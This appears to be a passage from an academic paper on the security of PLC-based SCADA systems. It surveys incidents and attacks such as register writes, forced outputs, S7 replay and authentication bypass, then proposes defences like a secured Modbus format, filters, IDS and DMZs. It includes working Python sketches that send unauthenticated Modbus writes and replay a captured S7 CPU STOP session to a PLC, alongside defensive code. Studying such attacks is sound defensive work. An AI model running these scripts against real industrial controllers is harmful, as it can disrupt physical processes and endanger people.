Many believed that a plant control system is an isolated system with no connection to the outside world, so that the possibility of an infection is minimal and computer viruses are ineffective against PLCs. Recent events, however, suggest that SCADA systems are at significant risk even when isolated from the plant's main network. In 2000, the Queensland waste management plant was hacked by a former employee and a large amount of sewage was dumped into public areas of the city; this happened in Australia using only a laptop and a wireless radio. In 2003, two important monitoring systems at the Davis-Besse nuclear plant in Ohio malfunctioned after a worm penetrated its computers [1]. This kind of malfunction could also lead to the loss of civilian lives. Incidents in 1999 at Bellingham and in 1992 at Brenham, Texas, caused three deaths and large damage to the infrastructure due to gas distribution system malfunctions, and in 2009 two metro trains collided, resulting in deaths and injuries to the passengers [1]. Even though such incidents occurred, there was little enthusiasm among the scientific community to explore the security concerns of PLC-related automated systems until the recent past.
After the discovery of the Stuxnet malware in 2010, there was a special eagerness among PLC producers as well as users to determine the security vulnerabilities associated with PLC-based systems. In other words, Stuxnet opened up a way of redesigning secure PLC architectures. PLC producers such as Hitachi, Mitsubishi, Panasonic, Samsung and Siemens have been working with antivirus producers such as Kaspersky and Symantec in recent years to determine solutions for such vulnerabilities and inefficiencies in PLC systems.

III. RELATED WORK

Malware poses a significant threat to industrial control systems. Fovino et al. [2] have presented the impact of traditional malware on SCADA systems while highlighting their potential damaging effects. A study carried out by Creery et al. [3] put forward a high-level analysis of possible threats to power plant control systems. Stuxnet, discovered in 2010, is a malware that affects the normal functionality of industrial control systems containing PLCs through a PLC rootkit [4]. R. Masood et al. [5] showed the impact of the Stuxnet worm on PLC systems by using a pressure sensor as the PLC and demonstrating how the pressure value drops to an unacceptable level when the Keil code of the design is changed. According to E. Byres [6], one of the main exploitable weaknesses in industrial control systems is the set of vulnerabilities in the communication protocols and their implementations. In order to find the shortcomings of the communication protocols, the Group for Advanced Information Technology (GAIT) and Cisco Systems took the initiative in investigating probable vulnerabilities in the SCADA protocols MODBUS and MODBUS/TCP [6].

In the quest for solutions to malware attacks, the analysis of malware is crucial. A limited number of tools are available for analyzing the latest generation of malicious software [7]. CWSandbox [8] is one such tool, capable of monitoring malware actions on execution. In relation to worm simulation, D. Ellis [9] presented a method based on mathematical propagation models from classical epidemiology, whereas Liljenstam et al. [10] proposed a method based on single-node worm simulations. According to M. Hentea, in order to manage risks it is important to identify the causes of vulnerabilities and to establish a vulnerability management life cycle that provides the design and technologies required to find and remediate weaknesses before they are exploited [11]. Patel et al. presented methods for SCADA security risk analysis by combining the concepts of vulnerability tree analysis, fault tree analysis and attack tree analysis [12].

IV. PLC VULNERABILITY ANALYSIS

PLCs have been used in industrial control systems for more than four decades, although cyber attacks on PLCs have come into the picture only recently. PLCs can be regarded as computers, so they are vulnerable to the same types of attacks as traditional IT systems [13][14], although the operation of the attacks may differ, since their target is to drive the physical process under the control of the PLC outside its safety margins.
ICSs use a variety of different protocols to communicate with field devices such as sensors and actuators, as well as for programming and communicating with PLCs in the process network. MODBUS, Ethernet/IP, DNP3 and ISO-TSAP are among the most commonly used protocols. Although these protocols work efficiently for communication, they were not designed to provide security, since security in industrial systems was not a concern when the protocols were first introduced. These protocols therefore provide no confidentiality, authentication or data integrity during operation, which makes them vulnerable to a variety of attacks.

A. By-pass Logic Attack

A PLC generally contains two Random Access Memory (RAM) areas, known as main memory and register memory. The main memory is used for storing the currently executing program logic, whereas the register memory is used as temporary memory by the executing logic [1]. Although the register memory is temporary, it is used by the executing logic and is therefore bound to contain important variables that affect the main logic. Industrial plants generally allow the register memory to be accessed, with read and write operations, by other PCs across the PLC network. Now assume that an attacker gains access to one of the machines in the PLC network and infects it with a worm capable of writing arbitrary values to the register memory. Since the register memory values are changed arbitrarily, a critical variable such as a pressure value can be altered; the executing logic will then act on the new value, which may cause the system to exceed its safety margins and possibly be driven to collapse.

B. Brute-Force Output Attack

The general functionality of a PLC is to make a decision based on its inputs and states and then use that decision to change an electrical output in order to alter a certain physical process. Typically, in industrial SCADA networks, most PLCs contain a special functionality called forcing outputs, which allows a PLC operator to remotely change an output forcefully. This can be done by connecting directly to the PLC, through a network or over the Internet [1]. The process does not require any authentication mechanism, meaning that anyone who has access can force outputs. The outputs of a PLC may affect physical processes such as governing the speed of a motor or controlling valves, switches, etc., so the consequences can be severe if an attacker gets the opportunity to exploit this feature. The attack is particularly dangerous because the intruder does not need any in-depth knowledge of the logic; only access is required. A minimal sketch of such an unauthenticated write is given below.
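To make the register-write and forced-output scenarios described above concrete, the following minimal Python sketch hand-builds a single Modbus/TCP Write Single Register request and sends it over a plain TCP socket. Because the protocol carries no authentication, any host that can reach TCP port 502 on the PLC can issue such a write; the PLC address, register number and forced value used here are purely hypothetical placeholders and not taken from any real deployment.

import socket
import struct

# Hypothetical target PLC and register: in a real plant these would be the
# address of a reachable PLC and of a process-critical holding register.
PLC_IP = "192.168.0.10"
MODBUS_PORT = 502          # standard Modbus/TCP port
REGISTER_ADDR = 0x0010     # e.g. a setpoint kept in register memory
FORCED_VALUE = 0xFFFF      # arbitrary value chosen by the attacker

def write_single_register(ip, register, value, unit_id=1, transaction_id=1, port=MODBUS_PORT):
    """Send an unauthenticated Modbus/TCP 'Write Single Register' (0x06) request."""
    # PDU: function code (1 byte) + register address (2 bytes) + value (2 bytes)
    pdu = struct.pack(">BHH", 0x06, register, value)
    # MBAP header: transaction id, protocol id (0), length of unit id + PDU, unit id
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    with socket.create_connection((ip, port), timeout=3) as sock:
        sock.sendall(mbap + pdu)
        return sock.recv(260)   # a well-behaved server echoes the request

if __name__ == "__main__":
    print(write_single_register(PLC_IP, REGISTER_ADDR, FORCED_VALUE).hex())

At the receiving PLC, such a frame is indistinguishable from a legitimate operator write, which is precisely the weakness exploited by the by-pass logic and brute-force output attacks.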
C. Exploits on Siemens Simatic S7 PLCs

This section describes some attacks that can be implemented against Siemens PLCs. These PLCs use the PROFINET fieldbus standard, which is based on Ethernet, to create a workable environment for networking protocols and industrial automation. Siemens PLCs are programmed with software known as Simatic TIA and the Step 7 Engineering software, and the communication between the software and the PLCs is based on the International Standards Organization Transport Service Access Point (ISO-TSAP) protocol. This protocol does not provide any encryption for the data exchanged with the PLC, meaning that all data are sent as plaintext. The vulnerabilities discussed below exploit this weakness of the ISO-TSAP protocol.

1) Replay Attack: The general idea of a replay attack is that an attacker intercepts some information or data and uses it to compromise the system at a later time. Before turning to the replay attack itself, a simple experiment gives some idea of the information exchanged between the PLC and the Step 7 programming software. Assume that a PLC is connected to a test network and the Step 7 software is running on the programming PC. In order to analyze the packet flow between the PLC and the software, a packet analyzer such as Wireshark can be used, since the ISO-TSAP protocol used for communication runs over the Transmission Control Protocol (TCP). After establishing the connection, a CPU STOP command is sent to the PLC while packets are captured with Wireshark. Once the PLC's CPU has stopped, the information exchanged during command execution can be examined by analyzing the captured packets. Fig. 1 shows a TCP stream captured during the execution of the CPU STOP command [13].

Fig. 1. Captured TCP stream during a CPU STOP command [13]

In Fig. 1, the information highlighted in blue is the data sent from the PLC to the Step 7 Engineering software. It includes some valuable facts about the PLC, such as its type, model number, etc. The raw data shown in red, on the other hand, gives an indication of the client-side information. This information in itself can be very important to an attacker, since it helps him to build malware specifically targeting a PLC in the system at a later time. Since the above information is revealed through the CPU STOP command, this is known as the CPU Start-Stop Attack. If the attacker is knowledgeable about the communication between the PLC and the Engineering software, he can capture more information about the PLC as well as its logic and even the underlying physical process. We showed above that interception of packets during a single command can reveal a great deal of valuable data, so it is obvious that listening to a full communication session will provide much more to an attacker. The attacker can therefore reuse the gathered data, manipulating it to his liking and adding malicious code, through a replay attack in order to compromise the PLC. Since none of the intercepted data is encrypted, the attacker can make the replay attack worse than it looks, especially compared with replay attacks on normal IT networks.

2) Man in the Middle (MIM) Attack: Another significant vulnerability of the ISO-TSAP protocol is that an attacker can act as a man in the middle between the PLC and the Step 7 software, taking advantage of the authentication-less nature of the protocol. The attacker can thus gather all data transmitted from the software to the PLC and vice versa without being noticed at either end. The information revealed through a MIM attack may also help an attacker to efficiently mount an attack on the process being controlled by the PLC.
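A minimal Python sketch of the replay step described in Section IV-C1 is shown below: the attacker simply resends previously captured client-to-PLC payloads, in their original order, over a new TCP connection. Port 102 is the standard ISO-on-TCP (RFC 1006) port used for S7 communication; the capture file name, the hex-per-line format and the idea that the captured sequence (connection setup followed by the CPU STOP job) can be replayed verbatim are illustrative assumptions made for this sketch.

import socket

# Hypothetical input: the raw client-to-PLC TCP payloads captured beforehand
# with a tool such as Wireshark, one hex-encoded payload per line, kept in the
# original order (COTP connection request, S7 setup, then the CPU STOP job).
CAPTURE_FILE = "cpu_stop_session.hex"
PLC_IP = "192.168.0.20"
ISO_TSAP_PORT = 102        # standard ISO-on-TCP (RFC 1006) port used by S7

def replay_captured_session(ip, capture_file):
    """Resend previously captured plaintext payloads to the PLC, in order."""
    with open(capture_file) as f:
        payloads = [bytes.fromhex(line.strip()) for line in f if line.strip()]
    with socket.create_connection((ip, ISO_TSAP_PORT), timeout=3) as sock:
        for payload in payloads:
            sock.sendall(payload)          # no encryption or authentication to defeat
            try:
                reply = sock.recv(1024)    # the PLC answers each request in plaintext
            except socket.timeout:
                reply = b""
            print(f"sent {len(payload)} bytes, received {len(reply)} bytes")

if __name__ == "__main__":
    replay_captured_session(PLC_IP, CAPTURE_FILE)

Because the session carries no keys, nonces or encryption, the replayed bytes are indistinguishable at the PLC from the original operator traffic.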
3) S7 Authentication Bypass Attack: In some cases PLCs are protected by passwords, although this is not very common in industrial automation, purely because operators did not believe it was possible to mount attacks against PLCs, since the field network is generally isolated. Even when a PLC is protected by a password, an attacker can bypass the authentication due to the lack of security in the protocol. The scenario is as follows. When a legitimate user needs to authenticate himself to the PLC, he sends an authentication packet which contains a hash of the PLC's password. After reception of the packet, the PLC verifies the user by comparing its own hash of the password with the received one. If the two match, the user is authenticated to the PLC and given access to the system. From the attacker's perspective, if he can grab an authentication packet from a valid user, he can replay that packet at a later time to authenticate himself to the PLC. Alternatively, he can hash a dictionary of commonly used passwords to find a match with the intercepted hash and thereby recover the plaintext password, which allows him to generate his own authentication packets as well. This suggests that protecting Siemens PLCs through passwords does not actually achieve its ultimate goal.

V. SECURING PLC SYSTEMS

When industrial systems were first deployed, no one believed it was possible to insert a malicious agent into the system and make it vulnerable. Most of the protocols and standards that govern communication inside these systems were developed based on this presumption, which has now proved to be wrong. The following are some countermeasures that can be adopted to secure critical infrastructure in industrial systems.

A. Protocol Modification to Enhance Security

The main reason for the vulnerability of PLC-based industrial systems is the flaws of protocols such as DNP3, Modbus and Profibus that are used for communication between PLCs and process network machines (MTUs). The inability of these protocols to provide authentication, confidentiality and integrity makes the system exploitable in many ways, and the fact that some of these exploits do not require high-level cryptanalytic knowledge makes the scenario far worse. In this section we discuss a method to secure an existing protocol by introducing some modifications to the Modbus protocol. We show how the structure of the protocol can be modified in order to provide data integrity and authentication between the nodes of a process network. Fig. 2 illustrates a modified Modbus data unit which can fulfil these security requirements.

Fig. 2. Secure Modbus Application Data Unit

1) Achieving Data Integrity: In order to achieve data integrity, the data unit is transmitted along with a Secure Hash Algorithm 2 (SHA2) digest of the data unit. On reception, a device in the process network recalculates the digest from the data and checks it against the digest sent by the source, and the data unit is only accepted if the computed digest matches the one sent by the source device. If the data is altered during transmission, the newly computed SHA2 digest will differ from the digest computed at the source, which allows the destination to detect the alteration.
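As a simple illustration of this integrity mechanism, the Python sketch below appends a SHA-256 digest (one member of the SHA-2 family) to a Modbus data unit before transmission and verifies it on reception. The "payload followed by digest" framing and the example PDU bytes are assumptions made for clarity; the exact field layout of the secured ADU in Fig. 2 is not reproduced here.

import hashlib

DIGEST_LEN = hashlib.sha256().digest_size   # 32 bytes for SHA-256

def protect_adu(adu: bytes) -> bytes:
    """Append a SHA-2 (SHA-256) digest of the Modbus data unit before sending."""
    return adu + hashlib.sha256(adu).digest()

def verify_adu(frame: bytes) -> bytes:
    """Recompute the digest at the receiver and accept the data unit only on a match."""
    adu, received_digest = frame[:-DIGEST_LEN], frame[-DIGEST_LEN:]
    if hashlib.sha256(adu).digest() != received_digest:
        raise ValueError("data unit rejected: digest mismatch, data altered in transit")
    return adu

# Hypothetical Modbus PDU writing value 0x00FF to register 0x0010.
frame = protect_adu(bytes.fromhex("06001000ff"))
assert verify_adu(frame) == bytes.fromhex("06001000ff")

Note that a bare digest only detects accidental or naive modification, since an attacker who alters the data can simply recompute the digest; binding the digest to a key, as in the signing scheme described next, is what prevents forgery.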
2) Establishing Authentication: Authentication among the end devices of a process network can be established by having each device manage a pair of private and public keys. The private key is known only to the device that owns it, whereas the public key is known to all devices in the network. Consider a case where a master device sends a control signal to a slave in the process network. The master generates the relevant data, computes a SHA2 digest and signs it with its private key before sending it to the corresponding slave device. Since the private key is known only to that specific device, the slave device can authenticate the master by verifying the signed digest with the master's public key.

3) Protection against Replay Attacks: In order to prevent replay attacks, there must be some way to distinguish between a packet that has just been generated and a packet that was captured earlier and injected into the network later. This can be achieved by introducing a Timestamp (TS) into the data unit. Since there is a finite delay between the sending and reception of packets, and devices may not be perfectly synchronized, the receiver has to use a specific timing window to decide whether to accept or drop a packet. If the packet arrives at the destination within the receiver's timing window it is accepted; otherwise it is discarded. The timing window must be large enough to ensure that legitimate packets are not dropped, and at the same time small enough to prevent an attacker from exploiting the window for a replay attack, so choosing an appropriate timing window is vital.

B. Protection via Special Filtering Units

Consider a scenario where an attacker succeeds in compromising an MTU of the process network. The attacker may then be able to capture the private key of the compromised device and use it to sign a malicious packet, which will ultimately look like a valid packet at the destination since it is signed correctly. As a result, the authentication mechanism may not provide the intended protection when a master device is compromised. This issue can be addressed by introducing a set of filtering units between the MTUs and the field devices of the process network. These filtering units can be divided into two main categories according to their functionality: signature-based filters and critical state detection filters. Signature-based filters use a predetermined set of known attack patterns (signatures) and check for these signatures in the packets passing through the filter. A critical state refers to an unwanted state of an industrial process which can lead to a system failure or violate the safety limits of the process; such states exist in any industrial system. The task of critical state filters is therefore to determine, by examining the content of the packets passing through, whether any packet can possibly lead to a critical state. A minimal sketch of such a critical state filter is given below.
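The Python sketch below illustrates the critical state filter idea: it inspects Modbus Write Single Register requests and drops any request whose value would push a monitored setpoint outside its configured safety limits. The register map, the limits and the restriction to a single function code are hypothetical simplifications; a real filtering unit would model many more function codes and process states.

import struct

# Hypothetical safety limits for registers that hold process-critical setpoints,
# e.g. a pressure setpoint that must stay between 10 and 120 engineering units.
CRITICAL_LIMITS = {
    0x0010: (10, 120),    # pressure setpoint
    0x0011: (0, 1500),    # motor speed setpoint
}

def allow_modbus_write(pdu: bytes) -> bool:
    """Return True if the Modbus PDU may pass through the filtering unit."""
    if len(pdu) != 5 or pdu[0] != 0x06:   # only Write Single Register is inspected here
        return True
    _, register, value = struct.unpack(">BHH", pdu)
    low, high = CRITICAL_LIMITS.get(register, (0x0000, 0xFFFF))
    if not low <= value <= high:
        print(f"blocked write of {value} to register {register:#06x}: critical state")
        return False
    return True

# A write of 0xFFFF to the pressure setpoint is dropped, while a write of 80 passes.
assert allow_modbus_write(struct.pack(">BHH", 0x06, 0x0010, 0xFFFF)) is False
assert allow_modbus_write(struct.pack(">BHH", 0x06, 0x0010, 80)) is True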
C. Intrusion Detection Systems

An attacker seeks access to the SCADA network in several ways and will select the most vulnerable location in the network, which can be either a host or a high-level device. Once it is infected, the intrusion should be detected, and for this purpose an Intrusion Detection System (IDS) can be used.

An IDS is a set of tools and processes providing network monitoring, which gives the network administrator the opportunity to analyze the network traffic. The network administrator is thus capable of detecting any unauthorized or unusual activity present within the network. IDSs are usually deployed at an ingress or egress point of the network; the connectivity point of critical network devices is another suitable location. An IDS is capable of monitoring the network traffic without impacting it. There are two types of detection used in IDSs: signature-based detection and statistical anomaly-based detection. In signature-based systems, the IDS compares the collected traffic data with a predefined set of rules or signatures. Every malicious process has its own signature; once that signature is determined, an IDS can detect the process and remove it from the network. Because of its easy implementation, the signature-based approach is popular among vendors. For this method to succeed, however, the signatures of every piece of malware produced would have to be included in the IDS, which is impractical. It took more than a year to identify the Stuxnet malware, and its origin is still unknown. Signature-based IDSs therefore do not provide protection against new malware whose signatures are not yet known and thus cannot be programmed into the IDS.

An anomaly-based IDS can detect abnormal processes occurring inside the network. This is achieved by comparing a number of traffic parameters, such as port numbers, data payloads, bandwidth and protocols, against their normal values. Once an anomaly is detected, the IDS alerts the system administrator and the firewall and sends information about the anomaly, so the administrator has the capability to prevent malware attacks. This method of intrusion detection is effective against all malware produced to date. A minimal sketch of this anomaly-based approach is given at the end of this subsection.

An IDS can also include an Intrusion Prevention System (IPS). The function of the IPS is to reset the connection and re-program the firewall so that the network blocks the traffic corresponding to the malicious process; it can be considered another application-layer firewall. A system which includes both detection and prevention is called an Intrusion Detection and Prevention (IDP) system. Even when such systems are installed in a SCADA system, they must be properly updated, monitored and validated; otherwise they will not be effective against the most recent malicious processes.
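To illustrate the anomaly-based approach, the short Python sketch below compares a few per-interval traffic parameters against a baseline learned during normal operation and raises an alert when any of them deviates beyond a tolerance. The parameter names, baseline values and tolerance are illustrative assumptions; a production IDS would use far richer features and statistical models.

# Baseline traffic profile learned during normal operation (hypothetical values).
BASELINE = {
    "packets_per_sec": 120.0,
    "mean_payload_bytes": 64.0,
    "distinct_dest_ports": 3.0,
}
TOLERANCE = 0.5   # alert when a parameter deviates more than 50% from its baseline

def detect_anomalies(observed: dict) -> list:
    """Return the traffic parameters that deviate too far from the baseline."""
    anomalies = []
    for name, normal in BASELINE.items():
        value = observed.get(name, 0.0)
        deviation = abs(value - normal) / normal
        if deviation > TOLERANCE:
            anomalies.append((name, value, deviation))
    return anomalies

# Example interval: a burst of traffic towards many ports, as a scanning worm might cause.
sample = {"packets_per_sec": 900.0, "mean_payload_bytes": 60.0, "distinct_dest_ports": 40.0}
for name, value, deviation in detect_anomalies(sample):
    print(f"ALERT: {name}={value} deviates {deviation:.0%} from its baseline")

Unlike a signature-based filter, such a detector needs no prior knowledge of a specific piece of malware, only a model of normal traffic.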
D. Creating Demilitarized Zones (DMZ)

DMZs are logical sub-networks inside a large network which separate the untrusted segment (the Internet) from the main network. This allows the network administrator to deploy an additional layer of security, since an attacker will only have access to the untrusted part of the network. In this approach, the whole network is segmented into multiple zones (External, Corporate, Data, Control and Safety) and each zone is firewall-protected, which prevents a threat from propagating to the whole network once it infects one partition. Multiple DMZs have proven to be effective in large network architectures.

E. Best Practices for Securing PLC Systems

There are several best practices that can aid in preventing harmful security attacks on PLC systems. A strong user account management policy should be used: passwords should be applied in every possible position, strong passwords should be chosen, and all unused accounts, along with default accounts, should be disabled. The process network and the Internet should not be connected directly, and PLC programming machines should only be connected to the PLCs while they are being programmed. Access to the control network through the intranet should be controlled and monitored. Remote control of devices and maintenance activities should follow a secure methodology that minimizes the possibility of an infection. The use of external drives such as USB sticks should be limited among users in order to prevent infections.

VI. CONCLUSIONS

In this paper we have focused on revealing the vulnerabilities of PLC-based SCADA systems and how those vulnerabilities can affect the critical infrastructure of common real-world applications. PLCs have been used as the low-level controlling devices in large ICSs, and there have been attempts by attackers to take control of such PLC-based systems ever since they were introduced. An attacker has to infect the computer which governs the PLC in order to control it, so the security of the governing computers in a PLC-based system is vital. The vulnerabilities of the process network are similar to those of an ICT network, except for the fact that it is isolated from the outside network; an infection can occur either via USB drives or via the intranet. Securing the system at such exposed points of the network can grant overall protection to the system.

In order to protect a PLC system, several methods can be adopted. The most vulnerable area in PLC systems is the lack of security in the communication protocols, so enhancing the security of such protocols is very important. In addition, filtering methods, firewalls, IDSs and DMZs can be introduced into the system to strengthen the overall security. Adopting all these methods at the same time is impractical: it would degrade the performance of the overall system, and the adaptation would not be economically beneficial. An effective combination of such methods should be chosen depending on the vulnerabilities and the architecture (which varies according to the vendor) of the system that needs to be protected.

The existing security policies do not provide complete protection for a PLC system. The deployment of firewalls alone is not sufficient to stop infections: a complex worm like Stuxnet can easily bypass a firewall without a trace. An IDS should be deployed along with a firewall in order to prevent the entry of infections. Filtering methods allow state changes and signatures to be detected, and the network can be designed according to DMZs. The future of PLC systems looks bright due to the attention given by the scientific community over the last few years. PLC designers and programmers should focus on security aspects under the supervision of security experts. Finding better solutions which provide adequate security without degrading performance excessively is an interesting area for future work.

REFERENCES
[1] R. Johnson, "Survey of SCADA security challenges and potential attack vectors," in Proceedings of the International Conference for Internet Technology and Secured Transactions (ICITST), IEEE, London, UK, Nov. 2010.
[2] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, "An experimental investigation of malware attacks on SCADA systems," International Journal of Critical Infrastructure Protection, vol. 2, no. 4, pp. 139-145, 2009.
[3] A. Creery and E. Byres, "Industrial cyber security for a power system and SCADA networks - be secure," IEEE Industry Applications Magazine, vol. 13, no. 4, pp. 39-55, 2007.
[4] N. Falliere, L. O. Murchu, and E. Chien, "W32.Stuxnet dossier," Symantec Security Response, version 1.4, 2011.
[5] R. Masood, U. U. Ghazia, and Z. Anwar, "SWAM: Stuxnet worm analysis in Metasploit," in Proceedings of Frontiers of Information Technology (FIT), IEEE, Islamabad, Pakistan, Dec. 2011.
[6] E. Byres, D. Hoffman, and N. Kube, "A study of security vulnerabilities in control protocols," 2006.
[7] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, "An experimental investigation of malware attacks on SCADA systems," International Journal of Critical Infrastructure Protection, vol. 2, no. 4, pp. 139-145, 2009.
[8] C. Willems, T. Holz, and F. Freiling, "Toward automated dynamic malware analysis using CWSandbox," IEEE Security & Privacy, vol. 5, no. 2, pp. 32-39, Mar.-Apr. 2007.
[9] D. Ellis, "Worm anatomy and model," in Proceedings of the ACM Workshop on Rapid Malcode, Washington DC, USA, Oct. 2003.
[10] M. Liljenstam, D. M. Nicol, V. H. Berk, and R. S. Gray, "Simulating realistic network worm traffic for worm warning system design and testing," in Proceedings of the ACM Workshop on Rapid Malcode, Washington DC, USA, Oct. 2003.
[11] M. Hentea, "Security for SCADA control systems," Journal of Information, Knowledge, and Management, vol. 3, 2008.
[12] S. C. Patel, J. H. Graham, and P. A. Ralston, "Security enhancement for SCADA communication protocols using augmented vulnerability trees," in CAINE, ISCA.
[13] S. McLaughlin, "On dynamic malware payloads aimed at programmable logic controllers," in Proceedings of the 6th USENIX Workshop on Hot Topics in Security, San Francisco, USA, Aug. 2011.
[14] A. A. Cardenas, S. Amin, and S. Sastry, "Research challenges for the security of control systems," in Proceedings of the 3rd USENIX Conference on Hot Topics in Security (HOTSEC), San Jose, USA, Aug. 2008.